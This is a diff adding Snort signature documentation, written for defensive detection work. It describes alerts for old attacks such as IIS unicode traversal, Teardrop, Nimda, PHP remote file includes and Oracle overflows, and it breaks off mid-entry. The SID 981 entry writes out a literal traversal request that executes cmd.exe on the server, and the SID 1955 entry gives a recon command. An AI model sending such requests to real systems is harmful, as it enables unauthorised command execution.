+--
+
--- /dev/null
+++ b/doc/signatures/2363.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2363
+
+--
+Summary:
+This event is generated when an attempt is made to access a file that
+has a known vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made access the file
+default_header.php used in the PHP application Cyboards. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Cyboards Cyboards PHP Lite 1.21
+	Cyboards Cyboards PHP Lite 1.25
+
+--
+Attack Scenarios:
+My manipulating certain variables contained in a PHP script an attacker
+may be able to supply code of their choosing and execute it on the
+server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/981.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+981
+
+--
+Summary:
+This event is generated when an attempt is made use a unicode encoded representaion of a "/" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when unicode encoding of specific characters is used.  This particular attack uses the unicode encoding of the "/" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can unicode encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
+GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0084
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
--- /dev/null
+++ b/doc/signatures/966.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+966
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/270.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+270
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Teardrop 
+Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+Teardrop exploits a vulnerability in some TCP/IP stack implementations.
+
+The program sends a specially crafted fragmented packet where the first
+fragment has offset 0 and data length N and the second fragment has an
+offset less than N (The fragments overlap).  The resulting packet cannot
+be properly assembled.
+
+Systems may hang or crash.
+
+--
+Affected Systems:
+	Windows 95
+	Windows NT 4.0 SP3 and earlier
+	HP HPUX 10.34 and earlier
+	Linux kernels 2.0.31 and earlier
+	FreeBSD 3.0 prior to October 27, 1998
+
+--
+Attack Scenarios:
+The can be done remotely against any open UDP port using a spoofed
+address.
+
+--
+Ease of Attack:
+Simple. Tools are readily available and require little knowledge on the 
+part of the attacker.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches are available from all affected vendors.  Newer versions from
+each vendor are not vulnerable.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexanders@mccd.edu>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/124
+
+CERT:
+http://www.cert.org/advisories/CA-1997-28.html
+
+FreeBSD:
+ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/old/FreeBSD-SA-98:08.fragment.asc
+
+--
--- /dev/null
+++ b/doc/signatures/2459.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2459
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running starts a webcam or sends an invitation to view a webcam to another Yahoo IM user. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+This event indicates that a Yahoo IM user in your network is sending a notification that he or she is starting a webcam or offering an invitation to view the webcam.  While there are no known exploits associated with showing or viewing webcams, it is possible that this activity is inappropriate in certain environments.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No know attack scenarios.
+
+--
+Ease of Attack:
+No know attack scenarios.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1309.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1309
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2212.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2212
+
+--
+Summary:
+This event is generated when an attempt is made to access imageFolio.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in BizDesign ImageFolio 3.01.
+
+--
+Impact:
+Remote execution of arbitrary code, possible session hijack.
+
+--
+Detailed Information:
+BizDesign ImageFolio 3.01 is a CGI-based web server application that manages image galleries. It contains a cross-site scripting vulnerability in imageFolio.cgi, where input is not properly validated. An attacker can craft a URL that, when executed by a legitimate user, runs with the security context of the web server. In this way, the attacker can obtain a legitimate user's session cookie, thereby posing as the user for the duration of the session.
+
+--
+Affected Systems:
+Any systems running BizDesign Image Folio version 3.0.1 or lower.
+
+--
+Attack Scenarios:
+An attacker crafts a URL that, when activated by a legitimate user, executes code that obtains the user's cookie on the user's computer with the security context of the web server. The attacker can then pose as the user for the duration of the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses imageFolio.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is unknown if this vulnerability has been fixed in ImageFolio 3.1. Contact the vendor, Bizdesign (http://www.bizdesign.com) for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/6265
+
+--
--- /dev/null
+++ b/doc/signatures/100000480.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000480
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Somery" application running on a webserver. 
+Access to the file "team.php" using a remote file being passed as the 
+"checkauth" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "checkauth" parameter in the "team.php" script used by 
+the "Somery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Somery
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000803.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000803
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "recent.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "recent.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1258.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1258
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1293.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid:
+1293
+
+--
+Summary: 
+This event is generated when traffic indicating Nimda worm activity is
+detected.
+
+--
+Impact:
+Possible infection by the Nimda virus.
+
+--
+Detailed Information:
+Nimda spreads by file infection, mass emailer, file share, or IIS unicode exploit 
+to attack unpatched systems.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows 2000
+
+--
+Attack Scenarios:
+An unpatched server is connected to the internet and is infected or
+an infected email is opened. Once infected the worm spreads itself.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check the suspect host for signs of infection. Apply patches 
+or upgrade the operating system
+
+--
+Contributors:
+Snort documentation contributed by Timothy Vienneau
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/virus/nimda.asp
+
+F-Secure:
+http://www.f-secure.com/v-descs/nimda.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/1408.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1408
+
+--
+Summary:
+This event is generated when a TCP packet having a large payload was
+detected. This is a possible indication of an actual or impending denial
+of service attack against a host running the Microsoft Distributed
+Transaction Service Coordinator (MSDTC).
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+MSDTC is used in a distributed or clustered environment for distributed
+transaction processing on Microsoft operating systems,
+
+A vulnerability exists in the handling of large amounts of data sent to
+the MSDTC process listening on port 3372. A packet in excess of 1023
+bytes will cause the service to become unresponsive, a packet in excess
+of 2000 bytes may cause the entire system to become unresponsive.
+
+--
+Affected Systems:
+	Microsoft IIS 5.0
+	Microsoft SQL Server 6.5 throught 2000
+	Microsoft Windows 2000 Advanced Server
+	Microsoft Windows 2000 Datacenter Server
+	Microsoft Windows 2000 Server
+	Microsoft Windows 2000 Professional
+ 
+--
+Attack Scenarios:
+An attacker needs to generate a packet with a payload in excess of 1023
+bytes and send it to port 3372 of an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Linux FTP servers and clients frequently transfer TCP packets having a 
+payload size larger than 1023 bytes. To distinguish a false positive, 
+determine whether MSDTC is running on the indicated destination source and 
+port.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+To manage the vulnerability, configure the system not to autmatically start 
+the MSDTC (Source: Security Operations Guide for Windows 2000 Server). 
+Alternatively, configure firewall rules to limit access to the service. To 
+eliminate false positives, revise the Snort rule to specify IP addresses of 
+only those hosts actually running the service.
+
+--
+Contributors:
+Snort documentation contributed by bmccarty@apu.edu
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Security Tracker:
+http://www.securitytracker.com/alerts/2002/Feb/1003415.html
+
+Microsoft:
+http://www.microsoft.com/TechNet/security/tools/iis4cl.asp
+http://www.microsoft.com/TechNet/archive/transsrv/mtxpg03.asp
+http://www.microsoft.com/TechNet/prodtechnol/sql/maintain/featusability/c08ppcsq.asp
--- /dev/null
+++ b/doc/signatures/100000322.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000322
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "mail.php" using a remote file being passed as 
+the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "mail.php" script used by 
+the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2639.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2639
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
--- /dev/null
+++ b/doc/signatures/1858.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+1858
+
+--
+Summary:
+This event is generated when an attempt is made to access a critical system file using a directory traversal technique.
+
+--
+Impact:
+Serious. Firewall management configuration files can be accessed. 
+ 
+--
+Detailed Information:
+The Windows filesystem still supports 8.3 filenames. PIX Firewall manager has a folder name with spaces and can be accessed using DOS-Tilde path format: C:/pixfir~1/ for example.
+
+Strict checking for this filename format is not performed by some PIX systems.
+
+--
+Affected Systems:
+Cisco PIX Firewall Manager 4.1.6
+Cisco PIX Firewall Manager 4.2.1
+
+Note: Versions 4.1.6b and 4.2.2 are not vulnerable to this attack.
+
+--
+Attack Scenarios:
+The attacker must have access to port 8181 (or 8080 sometimes). This is usually possible from internal network, so you have probably an internal host that is already compromised by an attacker or someone inside your company network attacks the PIX Firewall manager.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000469.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000469
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "iFoto" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "dir" parameter in the "index.php" script used 
+by the "iFoto" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using iFoto
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2733.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2733
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_master_propagation
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1106.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1106
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/537.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+537
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1955.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1955
+
+--
+Summary:
+This event is generated when a request is made to discover the version and configuration information associated with the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the version of amd running as well as other configuration information about the host.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its version number. A successful request will return the version number along with other valuable configuration information about the server, including the architecture.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the version number associated with amd.  The response may give an attacker valuable configuration information about the host.
+
+--
+Ease of Attack:
+Simple.  Execute the command 'amq -v -T -h hostname/IP'  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2462.txt
@@ -0,0 +1,71 @@
+Rule:
+alert ip any any -> any any (msg:"EXPLOIT IGMP IGAP account
+overflow attempt"; ip_proto:2; byte_test:1,>,63,0; byte_test:1,<,67,0;
+byte_test:1,>,16,12; reference:cve,CAN-2004-0176; reference:bugtraq,9952;
+classtype:attempted-admin; sid:2462; rev:1;)
+
+--
+Sid:
+2462
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Ethereal decode of the Internet Group membership Authentication 
+Protocol (IGAP).
+
+--
+Impact:
